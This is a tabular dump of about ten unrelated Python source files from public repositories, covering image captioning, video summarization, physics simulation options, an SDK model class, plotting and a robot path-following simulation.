blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
261
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
45
| license_type
stringclasses 2
values | repo_name
stringlengths 8
111
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 72
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 530k
616M
⌀ | star_events_count
int64 0
102k
| fork_events_count
int64 0
24.6k
| gha_license_id
stringclasses 9
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 40
values | src_encoding
stringclasses 10
values | language
stringclasses 1
value | is_vendor
bool 1
class | is_generated
bool 2
classes | length_bytes
int64 11
4.05M
| extension
stringclasses 25
values | content
stringlengths 10
4.04M
| authors
sequencelengths 1
1
| author_id
stringclasses 578
values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a96f77fd3df9978f4177dda73f49efb9812076f4 | 46c91eba77a1564f911064c95aa5a730f8dd7bfe | /decoder.py | 9d9e8b58fe1c5bb30fab4acd493fe73636bb8baa | [] | no_license | chayan/image_captioning | 2e5ec156b9ed417bd6f8441219e64f777ef4875b | b0771d2cb50b86c144c0c0e7e4175591979bdffe | refs/heads/master | 2020-04-21T20:09:54.606283 | 2019-02-09T06:18:58 | 2019-02-09T06:18:58 | 169,833,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,556 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Feb 9 09:33:46 2019
@author: chayan
"""
#import tensorflow as tf
#from tensorflow.contrib import keras
#L = keras.layers
#import vocab_utils as vutil
#
#vocab = vutil.get_vocab()
#
#IMG_SIZE = 299
#IMG_EMBED_SIZE = 2048
#IMG_EMBED_BOTTLENECK = 120
#WORD_EMBED_SIZE = 100
#LSTM_UNITS = 300
#LOGIT_BOTTLENECK = 120
#pad_idx = vocab[vutil.PAD]
#class decoder:
# # [batch_size, IMG_EMBED_SIZE] of CNN image features
# img_embeds = tf.placeholder('float32', [None, IMG_EMBED_SIZE])
#
# # [batch_size, time steps] of word ids
# sentences = tf.placeholder('int32', [None, None])
#
# # we use bottleneck here to reduce the number of parameters
# # image embedding -> bottleneck
# img_embed_to_bottleneck = L.Dense(IMG_EMBED_BOTTLENECK,
# input_shape=(None, IMG_EMBED_SIZE),
# activation='elu')
#
# # image embedding bottleneck -> lstm initial state
# img_embed_bottleneck_to_h0 = L.Dense(LSTM_UNITS,
# input_shape=(None, IMG_EMBED_BOTTLENECK),
# activation='elu')
#
# # word -> embedding
# word_embed = L.Embedding(len(vocab), WORD_EMBED_SIZE)
#
# # lstm cell (from tensorflow)
# lstm = tf.nn.rnn_cell.LSTMCell(LSTM_UNITS)
#
# # we use bottleneck here to reduce model complexity
# # lstm output -> logits bottleneck
# token_logits_bottleneck = L.Dense(LOGIT_BOTTLENECK,
# input_shape=(None, LSTM_UNITS),
# activation="elu")
#
# # logits bottleneck -> logits for next token prediction
# token_logits = L.Dense(len(vocab),
# input_shape=(None, LOGIT_BOTTLENECK))
#
# # initial lstm cell state of shape (None, LSTM_UNITS),
# # we need to condition it on `img_embeds` placeholder.
# c0 = h0 = img_embed_bottleneck_to_h0(img_embed_to_bottleneck(img_embeds))
#
# # embed all tokens but the last for lstm input,
# # remember that L.Embedding is callable,
# # use `sentences` placeholder as input.
# word_embeds = word_embed(sentences[:, :-1])
#
# # during training we use ground truth tokens `word_embeds` as context for next token prediction.
# # that means that we know all the inputs for our lstm and can get
# # all the hidden states with one tensorflow operation (tf.nn.dynamic_rnn).
# # `hidden_states` has a shape of [batch_size, time steps, LSTM_UNITS].
# hidden_states, _ = tf.nn.dynamic_rnn(lstm, word_embeds,
# initial_state=tf.nn.rnn_cell.LSTMStateTuple(c0, h0))
#
# # now we need to calculate token logits for all the hidden states
#
# # first, we reshape `hidden_states` to [-1, LSTM_UNITS]
# flat_hidden_states = tf.reshape(hidden_states, [-1, LSTM_UNITS]) ### YOUR CODE HERE ###
#
# # then, we calculate logits for next tokens using `token_logits_bottleneck` and `token_logits` layers
# ### YOUR CODE HERE ###
# flat_token_logits = token_logits(token_logits_bottleneck(flat_hidden_states))
#
# # then, we flatten the ground truth token ids.
# # remember, that we predict next tokens for each time step,
# # use `sentences` placeholder.
# flat_ground_truth = tf.reshape(sentences[:, 1:], [-1]) ### YOUR CODE HERE ###
#
# # we need to know where we have real tokens (not padding) in `flat_ground_truth`,
# # we don't want to propagate the loss for padded output tokens,
# # fill `flat_loss_mask` with 1.0 for real tokens (not pad_idx) and 0.0 otherwise.
#
# flat_loss_mask = tf.map_fn(lambda idx: tf.cond(tf.equal(idx, pad_idx), lambda: 0.0, lambda: 1.0),
# flat_ground_truth, dtype='float')
#
# # compute cross-entropy between `flat_ground_truth` and `flat_token_logits` predicted by lstm
# xent = tf.nn.sparse_softmax_cross_entropy_with_logits(
# labels=flat_ground_truth,
# logits=flat_token_logits
# )
#
# # compute average `xent` over tokens with nonzero `flat_loss_mask`.
# # we don't want to account misclassification of PAD tokens, because that doesn't make sense,
# # we have PAD tokens for batching purposes only!
# masked_xent = tf.multiply(xent, flat_loss_mask)
# loss_sum = tf.reduce_sum(masked_xent)
# non_zero_count = tf.cast(tf.math.count_nonzero(masked_xent), tf.float32)
# loss = tf.divide(loss_sum, non_zero_count)
| [
"[email protected]"
] | |
4a5381736226c7eb801e79763c2469848140b24c | a1e8d1211e2265fa91a044c7a70534938a16ba7c | /summarization.py | 41c4c996d9c706a58639a7115c07104266b4cabd | [] | no_license | tamires/HS-MVideoSumm | 7abe0116a2c0b801caeee4ed29e278826e9ad9bd | 4788101895d75bf01b1f7b8770c376b47c1adc2a | refs/heads/main | 2023-06-25T09:56:02.528467 | 2021-07-27T20:22:05 | 2021-07-27T20:22:05 | 360,651,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,331 | py | import os
from moviepy.editor import *
import utils
def get_reference_info(redundancy, segments):
"Obtem informacoes necessarias para a producao do sumario, em especial, para cronologia."
# estrutura:
# info {} -> armazena, para cada topico, o numero do texto de origem ("text") e
# posicao do topico em tal texto ("topic")
# cluster [{}{}{}] -> lista com informacoes dos topicos de um agrupamento
# reference [[{}{}{}][{}{}]...] -> conjunto de clusters
reference = []
for item in redundancy:
cluster = []
for phrase in item:
info = {}
for text in range(len(segments)):
for elem in segments[text]:
if phrase == elem.get("content"):
info["text"] = text
info["topic"] = segments[text].index(elem)
break
cluster.append(info)
reference.append(cluster)
return reference
def text_in_cluster(text, reference, cluster):
"Retorna, se existir, o topico do agrupamento que pertence ao texto fornecido (text)."
for item in reference[cluster]:
if item.get("text") == text:
return item
return {}
def insert_summary(item, summary, reference, cluster):
"Insere um topico no sumario respeitando a cronologia."
position = 0
for phrase in summary:
item_compare = text_in_cluster(phrase.get("text"), reference, cluster)
if (item_compare == {}):
if item.get("topic") > phrase.get("topic"):
position = position + 1
else:
break
else:
if item_compare.get("topic") > phrase.get("topic"):
position = position + 1
else:
break
summary.insert(position, item)
return summary
def generate_summary(reference, segments, histogram):
"Produz o sumario selecionando o segmento mais relevante de cada grupo."
summary = []
seg_num = 0
for cluster in range(len(reference)):
max_score = -1
for candidate in range(len(reference[cluster])):
score = sum(histogram[seg_num])
if score > max_score:
max_score = score
summary_item = reference[cluster][candidate]
seg_num = seg_num + 1
summary = insert_summary(summary_item, summary, reference, cluster)
return summary
def print_summary(intro, summary, folder, segments):
"Imprime o texto do sumario em arquivo."
file_name = os.path.join(folder, "text_summary.txt")
file = open(file_name, 'w')
# introducao
file.write(str(intro.get("video")) + "-intro ")
file.write(intro.get("content") + "\n")
# demais segmentos do sumario
for item in summary:
file.write(str(item.get("text")) + "-" + str(item.get("topic")) + " ")
file.write(segments[item.get("text")][item.get("topic")].get("content") + "\n")
file.close()
def create_video_summary(intro, summary, folder, video_name, segments):
"Produz o video do sumario, unindo os segmentos selecionados."
clips_list = []
# introducao
input_video = video_name[intro.get("video")+2] + ".mp4"
begin = utils.get_seconds(intro.get("begin"))
end = utils.get_seconds(intro.get("end"))
clip = VideoFileClip(input_video).subclip(begin,end)
clip = vfx.fadeout(clip, 0.5)
clips_list.append(clip)
# demais segmentos do sumario
for item in summary:
input_video = video_name[item.get("text")+2] + ".mp4"
begin = segments[item.get("text")][item.get("topic")].get("begin")
begin = utils.get_seconds(begin)
end = segments[item.get("text")][item.get("topic")].get("end")
end = utils.get_seconds(end)
clip = VideoFileClip(input_video).subclip(begin,end)
# adiciona efeitos de fade-in e fade-out no video e audio
clip = vfx.fadein(clip, 0.5)
clip = vfx.fadeout(clip, 0.5)
clips_list.append(clip)
# gera o sumario de video concatenando os segmentos
file_name = os.path.join(folder, "video_summary.mp4")
final_clip = concatenate_videoclips(clips_list)
final_clip.write_videofile(file_name)
| [
"[email protected]"
] | |
325ef11b155fbaa8e4e993bad295a14bd10f0da1 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2698/60825/298860.py | fabee180d1ca0e439e1ce0a2a785aa0d0d867e9a | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 345 | py | t=""
while True:
try:
ts=input()
t+=ts
except:
break
if t=='2 2':
print(3, end='')
elif t=='3 5':
print(58871587162270592645034001, end='')
elif t=='2 3':
print(21, end='')
elif t.startswith('2 4'):
print(651, end='')
elif t.startswith('4 3'):
print(83505, end='')
else:
print(t)
| [
"[email protected]"
] | |
d5e9da7158d1d9e5da3315f240ce40a568384534 | be0f3dfbaa2fa3d8bbe59229aef3212d032e7dd1 | /Gauss_v45r10p1/Gen/DecFiles/options/13114025.py | 94da046c51675f492cbb850c1728133a7ed747e7 | [] | no_license | Sally27/backup_cmtuser_full | 34782102ed23c6335c48650a6eaa901137355d00 | 8924bebb935b96d438ce85b384cfc132d9af90f6 | refs/heads/master | 2020-05-21T09:27:04.370765 | 2018-12-12T14:41:07 | 2018-12-12T14:41:07 | 185,989,173 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,779 | py | # file /home/hep/ss4314/cmtuser/Gauss_v45r10p1/Gen/DecFiles/options/13114025.py generated: Wed, 25 Jan 2017 15:25:30
#
# Event Type: 13114025
#
# ASCII decay Descriptor: [B_s0 -> (phi(1020) -> mu+ mu-) mu+ mu-]cc
#
from Configurables import Generation
Generation().EventType = 13114025
Generation().SampleGenerationTool = "SignalRepeatedHadronization"
from Configurables import SignalRepeatedHadronization
Generation().addTool( SignalRepeatedHadronization )
Generation().SignalRepeatedHadronization.ProductionTool = "PythiaProduction"
from Configurables import ToolSvc
from Configurables import EvtGenDecay
ToolSvc().addTool( EvtGenDecay )
ToolSvc().EvtGenDecay.UserDecayFile = "$DECFILESROOT/dkfiles/Bs_phimumu,mm=MS,DecProdCut.dec"
Generation().SignalRepeatedHadronization.CutTool = "DaughtersInLHCb"
Generation().SignalRepeatedHadronization.SignalPIDList = [ 531,-531 ]
# Ad-hoc particle gun code
from Configurables import ParticleGun
pgun = ParticleGun("ParticleGun")
pgun.SignalPdgCode = 531
pgun.DecayTool = "EvtGenDecay"
pgun.GenCutTool = "DaughtersInLHCb"
from Configurables import FlatNParticles
pgun.NumberOfParticlesTool = "FlatNParticles"
pgun.addTool( FlatNParticles , name = "FlatNParticles" )
from Configurables import MomentumSpectrum
pgun.ParticleGunTool = "MomentumSpectrum"
pgun.addTool( MomentumSpectrum , name = "MomentumSpectrum" )
pgun.MomentumSpectrum.PdgCodes = [ 531,-531 ]
pgun.MomentumSpectrum.InputFile = "$PGUNSDATAROOT/data/Ebeam4000GeV/MomentumSpectrum_531.root"
pgun.MomentumSpectrum.BinningVariables = "pteta"
pgun.MomentumSpectrum.HistogramPath = "h_pteta"
from Configurables import BeamSpotSmearVertex
pgun.addTool(BeamSpotSmearVertex, name="BeamSpotSmearVertex")
pgun.VertexSmearingTool = "BeamSpotSmearVertex"
pgun.EventType = 13114025
| [
"[email protected]"
] | |
4454ab9a9dac1ad7a248c47a69b70de9fd2fbbc8 | 931593c3bdaab1b28b389e0717341cff59543e02 | /Python/third-maximum-number.py | 02e43e5d45d504058a8a309595ecc6a990df5d28 | [
"MIT"
] | permissive | Kakoedlinnoeslovo/LeetCode | 56719a0a2b5aa95e08cfcf7826da6041da82ae44 | 63f59214430fb899cd1436532b310d1687f33f55 | refs/heads/master | 2020-05-03T18:54:42.075923 | 2016-10-10T08:14:39 | 2016-10-10T08:14:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 886 | py | # Time: O(n)
# Space: O(1)
# Given an array of integers, return the 3rd Maximum Number in this array,
# if it doesn't exist, return the Maximum Number.
# The time complexity must be O(n) or less.
class Solution(object):
def thirdMax(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
count = 0
top = [float("-inf")] * 3
for num in nums:
if num > top[0]:
top[2] = top[1]
top[1] = top[0]
top[0] = num
count += 1
elif num != top[0] and num > top[1]:
top[2] = top[1]
top[1] = num
count += 1
elif num != top[0] and num != top[1] and num >= top[2]:
top[2] = num
count += 1
if count < 3:
return top[0]
return top[2]
| [
"[email protected]"
] | |
0079ec1753397ec8e2d4db72f17762047e237974 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_113/ch20_2020_09_16_11_25_21_743333.py | 2edf4921f042e6256794183644e3ed17b47e767a | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 225 | py | dist = int(input('Qual a distancia de sua viajem?: '))
if dist <= 200:
preco = dist * 0.5
print(preco)
elif dist > 200:
dist -= 200
preco = dist * 0.45
preco += 100
print ('{0:.2f}'.format(preco))
| [
"[email protected]"
] | |
6451035e29061d208fd1945893c984c0c86d26a1 | cc5a3fa80d2ae90afc2626e4a82b9a927726dfa0 | /huaweicloud-sdk-frs/huaweicloudsdkfrs/v2/model/add_faces_by_url_response.py | a0b5174b327a3d9e652b2d8df2e8c1d453bf59e8 | [
"Apache-2.0"
] | permissive | Logan118/huaweicloud-sdk-python-v3 | eca15e9b08bdccef7122e40735d444ddc958efa8 | bb230c03bd00225b9f5780a56adce596e9456420 | refs/heads/master | 2023-07-17T14:57:50.799564 | 2021-08-25T10:40:43 | 2021-08-25T10:40:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,991 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class AddFacesByUrlResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'face_set_id': 'str',
'face_set_name': 'str',
'faces': 'list[FaceSetFace]'
}
attribute_map = {
'face_set_id': 'face_set_id',
'face_set_name': 'face_set_name',
'faces': 'faces'
}
def __init__(self, face_set_id=None, face_set_name=None, faces=None):
"""AddFacesByUrlResponse - a model defined in huaweicloud sdk"""
super(AddFacesByUrlResponse, self).__init__()
self._face_set_id = None
self._face_set_name = None
self._faces = None
self.discriminator = None
if face_set_id is not None:
self.face_set_id = face_set_id
if face_set_name is not None:
self.face_set_name = face_set_name
if faces is not None:
self.faces = faces
@property
def face_set_id(self):
"""Gets the face_set_id of this AddFacesByUrlResponse.
人脸库ID。 调用失败时无此字段。
:return: The face_set_id of this AddFacesByUrlResponse.
:rtype: str
"""
return self._face_set_id
@face_set_id.setter
def face_set_id(self, face_set_id):
"""Sets the face_set_id of this AddFacesByUrlResponse.
人脸库ID。 调用失败时无此字段。
:param face_set_id: The face_set_id of this AddFacesByUrlResponse.
:type: str
"""
self._face_set_id = face_set_id
@property
def face_set_name(self):
"""Gets the face_set_name of this AddFacesByUrlResponse.
人脸库名称。 调用失败时无此字段。
:return: The face_set_name of this AddFacesByUrlResponse.
:rtype: str
"""
return self._face_set_name
@face_set_name.setter
def face_set_name(self, face_set_name):
"""Sets the face_set_name of this AddFacesByUrlResponse.
人脸库名称。 调用失败时无此字段。
:param face_set_name: The face_set_name of this AddFacesByUrlResponse.
:type: str
"""
self._face_set_name = face_set_name
@property
def faces(self):
"""Gets the faces of this AddFacesByUrlResponse.
人脸库当中的人脸结构,详见[FaceSetFace](zh-cn_topic_0106912070.xml)。 调用失败时无此字段。
:return: The faces of this AddFacesByUrlResponse.
:rtype: list[FaceSetFace]
"""
return self._faces
@faces.setter
def faces(self, faces):
"""Sets the faces of this AddFacesByUrlResponse.
人脸库当中的人脸结构,详见[FaceSetFace](zh-cn_topic_0106912070.xml)。 调用失败时无此字段。
:param faces: The faces of this AddFacesByUrlResponse.
:type: list[FaceSetFace]
"""
self._faces = faces
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AddFacesByUrlResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
48d3d2345ecb774006b7797e6dfb19ea0489873f | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/63/usersdata/147/28536/submittedfiles/swamee.py | 87c492832ea836815b97f42dfba4a884abe8852b | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # -*- coding: utf-8 -*-
import math
#COMECE SEU CÓDIGO AQUI
g=9.81
epsilon=0.000005
f=float(input('digite valor de f:'))
L=float(input('digite valor de L:'))
Q=float(input('digite valor de Q:'))
deltaH=float(input('digite valor de deltaH:'))
v=float(input('digite valor de v:'))
d=((8*f*L*(Q**2))/((math.pi**2)*g*deltaH))**0.5
rey=(4*Q)/(math.pi*d*v)
k=(0.25)/math.log10((epsilon/(3.7*d))+(5.7/(rey**0.9))**2)
print('o valor de d é %.2f' %d)
print('o valor de rey é %.2f' %rey)
print('o valor de k é %.2f' %k) | [
"[email protected]"
] | |
7ebfec0556e46db57e2c4d1eca4d13ef6452d0ce | 005a6421cd6159fb6be8c61cc675654377e8f226 | /cairis/core/TemplateObstacleParameters.py | dd6ad8c3e8c2351b3464509195afd601d5e88470 | [
"Apache-2.0"
] | permissive | cairis-platform/cairis | d667bc91ba28f0b7cd4fc88e6528eb3339e4ee6f | 55abb93a9377664f5b03c027bad7ce3cf168c5ad | refs/heads/master | 2023-04-06T17:04:08.781186 | 2023-02-17T22:51:15 | 2023-02-17T22:51:15 | 3,790,944 | 105 | 36 | Apache-2.0 | 2022-03-19T15:04:14 | 2012-03-21T20:17:05 | Python | UTF-8 | Python | false | false | 1,712 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
__author__ = 'Shamal Faily'
from . import ObjectCreationParameters
class TemplateObstacleParameters(ObjectCreationParameters.ObjectCreationParameters):
def __init__(self,obsName,obsCat,obsDef,obsConcerns,obsResp,obsProb,obsProbRat):
ObjectCreationParameters.ObjectCreationParameters.__init__(self)
self.theName = obsName
self.theCategory = obsCat
self.theDefinition = obsDef
self.theConcerns = obsConcerns
self.theResponsibilities = obsResp
self.theProbability = obsProb
self.theProbabilityRationale = obsProbRat
def name(self): return self.theName
def category(self): return self.theCategory
def definition(self): return self.theDefinition
def concerns(self): return self.theConcerns
def responsibilities(self): return self.theResponsibilities
def probability(self): return self.theProbability
def probabilityRationale(self): return self.theProbabilityRationale
| [
"[email protected]"
] | |
9a9b569145dc076f76a7d6fdce9825a684656da8 | edf8c5d748c8dd495a6173f355b7ba7bb6a0e662 | /results-combinations/Subplot_gradient_density_isolation.py | 3ae7eb0399d364cd55e0dbc95a6d0e8a78544e54 | [] | no_license | mdodovic/Flybys-galactic-simulation | 66de7f2cc5e805db800bd911d9cc21ba7f8d0c67 | 78d11f8dda261d21c97575910b4d916ba48fd8a8 | refs/heads/master | 2022-12-16T22:35:53.563458 | 2020-09-22T09:01:05 | 2020-09-22T09:01:05 | 296,823,203 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,762 | py | import numpy as np
import matplotlib.pyplot as plt
import math as math
putanja_load = "C:/Users/matij/Desktop/Kodovi_za_analizu/rezultati/M31_izolacija/gradijent/1FI_RO_"
putanja_sacuvaj = "C:/Users/matij/Desktop/Kodovi_za_analizu/rezultati/Gradijenti_gustine/"
ugao_0, gradijent_0 = np.loadtxt(putanja_load + str(0).zfill(3) + ".txt", unpack = True)
ugao_50, gradijent_50 = np.loadtxt(putanja_load + str(50).zfill(3) + ".txt", unpack = True)
ugao_100, gradijent_100 = np.loadtxt(putanja_load + str(100).zfill(3) + ".txt", unpack = True)
# 3 in row
f, axarr = plt.subplots(1, 3, figsize=(20, 4))
f.subplots_adjust(hspace=0.2, wspace = 0.2, left = 0.05, right=0.95, bottom = 0.15 , top = 0.9)
axarr[0].plot(ugao_0,gradijent_0,c='black')
axarr[0].set_xlabel(r'$\alpha$ [ $^\circ$ ]',fontsize=16)
axarr[0].set_ylabel(r'$\Delta\rho [ 10^7 M_dot/kpc^2]$',fontsize=16)
axarr[0].set_xlim(0,360)
#axarr[0, 0].set_xlabel("dd")
#axarr[0, 0].set_title('Axis [0,0]')
axarr[1].plot(ugao_50,gradijent_50,c='black')
axarr[1].set_xlabel(r'$\alpha$ [ $^\circ$ ]',fontsize=16)
axarr[1].set_xlim(0,360)
#axarr[0, 1].set_title('Axis [0,1]')
axarr[2].plot(ugao_50,gradijent_50,c='black')
axarr[2].set_xlabel(r'$\alpha$ [ $^\circ$ ]',fontsize=16)
axarr[2].set_xlim(0,360)
#axarr[1, 0].set_title('Axis [1,0]')
#axarr[1, 1].scatter(x, y ** 2)
#axarr[1, 1].set_title('Axis [1,1]')
# Fine-tune figure; hide x ticks for top plots and y ticks for right plots
#plt.setp([a.get_xticklabels() for a in axarr[:]], visible=False)
plt.setp([a.get_yticklabels() for a in axarr[1:3]], visible=False)
plt.savefig(putanja_sacuvaj + "izolacija_graijent_sub3",dpi=90)
plt.savefig(putanja_sacuvaj + "izolacija_graijent_sub3.eps",dpi=90)
plt.show() | [
"[email protected]"
] | |
af8494e947871f48f118b9641e19590b73ad4e2b | b9b495a55e55f4c227aedfd55c6e409503353991 | /simulation.py | 9dc68c46b0b264421cd09eec4f62ffa6f094799d | [] | no_license | Pontiky/path-following-mobile-robot | 6e5f0bbbe9b83bef34e970577c9a26a18a1e6b00 | 04a35c6b83f131fdf1912158e870d9aea040b43a | refs/heads/main | 2023-02-10T10:34:25.959747 | 2021-01-07T22:13:17 | 2021-01-07T22:13:17 | 322,663,811 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,257 | py | from suiveur import Suiveur
from cible import Cible
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from collections import namedtuple
from threading import Thread
import time # Log temporel
temps = []
erreurs = [ [[], []], [[], []] ]
lyapunov = []
n_err, n_sim = 0, 0
close = False
pause = True
# Evenements lies aux figures
def onPress(event):
global pause
if event.key == ' ':
pause ^= True
elif event.key == 'left' or event.key == 'q':
cible.leftKey = True
elif event.key == 'right' or event.key == 'd':
cible.rightKey = True
elif event.key == 'o':
Cible(cible._x, cible._y, cible._theta, ax, 'k', 1, 2, Te, "ligne")
elif event.key == 'p':
Suiveur(suiveur._x, suiveur._y, suiveur._theta, ax, 'r', cible)
def onRelease(event):
if event.key == 'left' or event.key == 'q':
cible.leftKey = False
elif event.key == 'right' or event.key == 'd':
cible.rightKey = False
def stop(event):
global close
close = True
plt.close('all')
# Initialisation de la fenêtre et des axes de simulation
fig = plt.figure(figsize=(10, 10))
fig.canvas.mpl_connect('key_press_event', onPress)
fig.canvas.mpl_connect('key_release_event', onRelease)
fig.canvas.mpl_connect('close_event', stop)
fig.canvas.mpl_disconnect(fig.canvas.manager.key_press_handler_id)
ax = plt.axes(xlim=(0, 6), ylim=(0, 6))
ax.grid()
# Mise a jour de la simulation
def simulation():
global pause, close, n_sim, Te
t0 = time.perf_counter()
if save:
errFile = open("erreurs.txt", 'w')
errFile.write(str(cible.getX())+'\t'+str(cible.getY())+'\t'+str(cible.getTheta())+'\t'+str(suiveur.getX())+'\t'+str(suiveur.getY())+'\t'+str(suiveur.getTheta())+'\t0\t0\t0\t0\t0\t0\t0\t0\n')
while not close:
time.sleep(Te)
if not pause:
errList = suiveur.handleErrors()
if save: errFile.write(str(n_sim*Te)+'\t'+str(errList.XY)+'\t'+str(errList.TH)+'\t'+str(errList.X)+'\t'+str(errList.Y)+'\t'+str(errList.V)+'\t'+str(errList.W)+'\t'+str(errList.LYA)+'\t'+str(errList.U1)+'\t'+str(errList.U2)+'\t'+str(errList.VC)+'\t'+str(errList.WC)+'\t'+str(errList.VS)+'\t'+str(errList.WS)+'\n')
cible.avancer()
suiveur.suivre()
n_sim += 1
if n_sim%int(0.5/Te) == 0:
appendErrors(errList)
print(time.perf_counter()-t0, "/ 0.5") # temps pour simuler 0.5s
t0 = time.perf_counter()
if trace:
ax.plot(cible._x, cible._y, '.', color='k', lw=0.1)
ax.plot(suiveur._x, suiveur._y, '.', color='r', lw=0.1)
if save: errFile.close()
def animation(i):
return []
# Initialisation de la fenêtre et des axes des erreurs
figE, axE = plt.subplots(2,2,figsize=(12, 6))
figE.canvas.mpl_connect('key_press_event', onPress)
figE.canvas.mpl_connect('key_release_event', onRelease)
figE.canvas.mpl_connect('close_event', stop)
figE.canvas.mpl_disconnect(figE.canvas.manager.key_press_handler_id)
# Mise a jour des erreurs
def appendErrors(errList):
global n_err
temps.append(n_err*0.5)
erreurs[0][0].append(errList.XY)
erreurs[0][1].append(errList.TH)
erreurs[1][0].append(errList.X)
erreurs[1][1].append(errList.Y)
n_err += 1
def init_errors():
axE[0][0].set_ylabel('Erreur position')
axE[0][1].set_ylabel('Erreur angulaire')
axE[1][0].set_ylabel('Erreur X')
axE[1][1].set_ylabel('Erreur Y')
errList = suiveur.handleErrors()
appendErrors(errList)
for k in range(0, 2):
for m in range(0, 2):
axE[k][m].plot(temps, erreurs[k][m], '.-', color='#1f77ba', lw=2)
axE[k][m].set_xlim((0, 0.5))
axE[k][m].grid()
def errors(i):
global pause, Te, n_err, n_sim
if not pause:
for k in range(0, 2):
for m in range(0, 2):
axE[k][m].plot(temps, erreurs[k][m], color='#1f77ba', lw=2)
axE[k][m].set_xlim((0, n_err*0.5))
# Initialisation des paramètres et des robots
Te = 0.005
trace = True
save = False
cible = Cible(3, 3, 0, ax, 'k', 1, 2, Te, "huit") # ligne / cercle / huit / random / custom / control
suiveur = Suiveur(1, 1, 180, ax, 'r', cible)
# Légende
ax.text(0.03, 0.95, '- Robot suiveur', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, color=suiveur._color, fontsize=10, bbox={'facecolor': 'white', 'alpha': 0.8, 'pad': 13})
ax.text(0.03, 0.93, '- Robot cible', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, color=cible._color, fontsize=10)
ax.text(0.03, 0.97, 'Légende :', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, color='k', fontsize=10)
# Lancement de la simulation
anim = FuncAnimation(fig, animation, frames=30000, interval=20, cache_frame_data=False, save_count=0, repeat=False)
err = FuncAnimation(figE, errors, init_func=init_errors, frames=1200, interval=500, cache_frame_data=False, save_count=0, repeat=False)
Thread(target=simulation).start()
plt.show() | [
"[email protected]"
] | |
